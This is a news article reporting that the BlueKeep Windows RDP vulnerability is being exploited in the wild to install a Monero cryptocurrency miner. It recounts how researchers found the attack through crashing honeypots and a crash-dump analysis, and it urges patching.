



Well, this is an unfortunate turn of events. Back in July, security researchers at Sophos created a proof-of-concept demonstration showing on how easy it would be for an unpatched RDP (Remote Desktop Protocol) server to be compromised by BlueKeep, a wormable Windows bug. Fast forward to today, and it's been discovered BlueKeep is actively being exploited in the wild.





BlueKeep is a dangerous remote code execution vulnerability, and it is no longer a theoretical threat. The evidence so far points to affected machines being used to mine cryptocurrency. There could be worse consequences for this type of bug, though hijacking a PC's resources for mining purposes is, at the very least, an annoyance.





Evidence of BlueKeep's exploitation in the wild came by way of Kevin Beaumont, a security researcher who noticed multiple honeypots in his EternalPort RDP network crashing and rebooting. This struck him as unusual because it is the first time this has happened in a nearly a year and a half.

It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner. https://t.co/7G88YAW5lr — MalwareTech (@MalwareTechBlog) November 2, 2019

At first, Beaumont said there was no evidence of the crashing and rebooting being related to an RDP exploit. However, he sent the logs over to MalwareTech, and after digging through the crash dump, it was discovered "the BlueKeep worm has finally arrived!"





The investigation uncovered "BlueKeep artifacts in memory and shellcode to drop a Monero miner." What this appears to be doing is running an encoded PowerShell command that prompts an infected system to download a second PowerShell script, which is also encoded. The final payload is the one that looks like a cryptocurrency miner (it's detected as such by 25 antivirus engines on VirusTotal).







It's not entirely clear if the virus is an actual worm, though it does look to be exploiting the BlueKeep bug. So, the good news here is it does not self-propagate . Instead, the culprit is likely getting IP addresses from a list. According to a previous Microsoft advisory , it affects multiple versions of Windows 7, Windows Server 2008, and Windows Server 2008 R2.





The ability to self-propagate (making it wormable) is what makes BlueKeep particularly worrisome. In doing so, related malware can quickly spread across a network. Microsoft has already issued a patch, and businesses are highly advised to make sure to update their systems.

